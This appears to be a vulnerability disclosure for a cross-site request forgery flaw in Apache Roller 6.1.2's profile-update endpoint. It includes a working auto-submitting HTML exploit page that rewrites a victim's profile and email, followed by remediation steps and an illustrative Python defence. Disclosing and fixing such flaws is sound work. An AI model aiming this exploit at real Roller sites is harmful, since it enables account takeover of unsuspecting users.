vanlam2001/roller-csrf
Apache Roller v6.1.2 - Cross-Site Request Forgery (CSRF) in Profile Update

Vulnerability Details

Overview

Apache Roller 6.1.2 and earlier contain a Cross-Site Request Forgery (CSRF) vulnerability in the profile-update endpoint /roller/roller-ui/profile!save.rol.

An attacker who lures a logged-in Roller user to a crafted HTML page can change that user's profile fields (screen name, full name, email address, locale, time zone) without the user's knowledge or consent.

Proof of Concept

The endpoint accepts a profile-update POST from any origin as long as the browser attaches the victim's session cookie: no anti-CSRF token is required and the request is not tied to the page that rendered the form, so a page on an attacker-controlled site can submit the form on the victim's behalf. The PoC below hard-codes the target account's login name (vanlam) in bean.userName and leaves both password fields empty; everything else is overwritten with attacker-chosen values.

HTML Exploit Code

The page auto-submits the hidden form as soon as it loads (the form sits in the body, where a form belongs; the script runs after the form element exists):

<html>
<head>
    <title>CSRF PoC - Apache Roller profile update</title>
</head>
<body>
    <!-- Cross-site POST to the vulnerable profile-save action; the victim's
         browser adds the Roller session cookie automatically. -->
    <form id="exploitForm" action="http://localhost:8080/roller/roller-ui/profile!save.rol" method="POST">
        <input name="bean.userName" value="vanlam" type="hidden">
        <input name="bean.screenName" value="hacked" type="hidden">
        <input name="bean.fullName" value="hacked" type="hidden">
        <input name="bean.emailAddress" value="[email protected]" type="hidden">
        <input name="bean.passwordText" value="" type="hidden">
        <input name="bean.passwordConfirm" value="" type="hidden">
        <input name="bean.locale" value="vi_VN" type="hidden">
        <input name="bean.timeZone" value="Asia/Bangkok" type="hidden">
    </form>

    <script>
        // Submit without any user interaction.
        document.getElementById('exploitForm').submit();
    </script>
</body>
</html>

Form Parameters

  • bean.userName: vanlam
  • bean.screenName: hacked
  • bean.fullName: hacked
  • bean.emailAddress: [email protected]
  • bean.passwordText: (empty)
  • bean.passwordConfirm: (empty)
  • bean.locale: vi_VN
  • bean.timeZone: Asia/Bangkok

Impact

An attacker can craft a malicious HTML page that, when visited by an authenticated Roller user, automatically submits a form that rewrites the victim's profile without their consent. This can lead to:

  • Unauthorized changes to user profile data
  • Potential account takeover: once the account email points at an attacker-controlled address, any password-reset or notification flow that relies on that email reaches the attacker instead of the user
  • Disruption of the user experience through unwanted locale and time zone changes

Remediation

  • Require a per-session anti-CSRF token (synchronizer token) on every state-changing request, including profile!save.rol, and reject requests whose token is missing or does not match
  • Validate the Origin header (falling back to Referer when Origin is absent) against the site's own origin, and reject state-changing requests that carry neither
  • Set the session cookie with the SameSite attribute (Lax or Strict) so the browser does not attach it to cross-site form posts
  • Keep authentication and authorization checks in place, but note that they alone do not stop CSRF: the forged request carries the victim's valid session
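The following is an added illustration of the first three remediation points, written for this write-up; it is not Apache Roller code and does not reflect how Roller implements its fix. It models a profile-save handler that checks the Origin/Referer header and a synchronizer token, and shows the session cookie attributes that stop the browser from attaching the cookie to a cross-site POST. The allowed origin http://localhost:8080, the cookie name JSESSIONID and the request samples are assumptions constructed for the demo.

```python
"""Server-side CSRF defences for a state-changing endpoint (illustrative, not Roller's code)."""
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed deployment origin; a real deployment derives this from configuration.
ALLOWED_ORIGINS = {"http://localhost:8080"}


def origin_check(headers):
    """Accept only if Origin (or, when absent, Referer) names an allowed origin.

    Browsers send Origin on cross-site form POSTs, so the PoC request arrives
    with the attacker's origin. A request with neither header is rejected:
    for a state-changing action an unknown source is not trusted.
    """
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin in ALLOWED_ORIGINS


def issue_token(session):
    """Bind a fresh random token to the session; the server embeds it in the form."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def token_check(session, form):
    """Synchronizer-token check with a constant-time comparison."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected, supplied)


def save_profile(session, headers, form):
    """Gate the profile update behind both checks; return the outcome as text."""
    if not origin_check(headers):
        return "rejected: bad or missing Origin/Referer"
    if not token_check(session, form):
        return "rejected: missing or invalid CSRF token"
    # A real handler would apply form["bean.*"] to the account here.
    return "ok"


def session_cookie_header(value):
    """Set-Cookie value that keeps the session cookie off cross-site POSTs.

    Cookie name assumed (servlet-container default); SameSite=Lax blocks the
    auto-submitted cross-site form in the PoC, HttpOnly keeps scripts away.
    """
    return f"JSESSIONID={value}; Path=/roller; HttpOnly; SameSite=Lax"


def demo():
    """Run the PoC request and a legitimate request through the handler."""
    session = {}
    token = issue_token(session)

    # Constructed sample: the fields the PoC page submits, from the attacker's origin.
    forged_form = {
        "bean.userName": "vanlam",
        "bean.screenName": "hacked",
        "bean.fullName": "hacked",
        "bean.locale": "vi_VN",
        "bean.timeZone": "Asia/Bangkok",
    }
    forged_headers = {"Origin": "http://attacker.example"}

    # Constructed sample: the same fields submitted from Roller's own form.
    legit_form = dict(forged_form, csrf_token=token)
    legit_headers = {"Origin": "http://localhost:8080"}

    return {
        "forged": save_profile(session, forged_headers, forged_form),
        # Right origin but no token (e.g. a replayed or hand-built request).
        "no_token": save_profile(session, legit_headers, forged_form),
        # Token present but neither Origin nor Referer.
        "no_origin": save_profile(session, {}, legit_form),
        "legit": save_profile(session, legit_headers, legit_form),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
    print(session_cookie_header("example"))
```

Both checks are applied independently: the origin check stops the auto-submitted cross-site form even if a token ever leaks, and the token check stops a same-origin or header-stripped request that has no token. The SameSite cookie attribute is a browser-side defence that complements, rather than replaces, the server-side checks.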
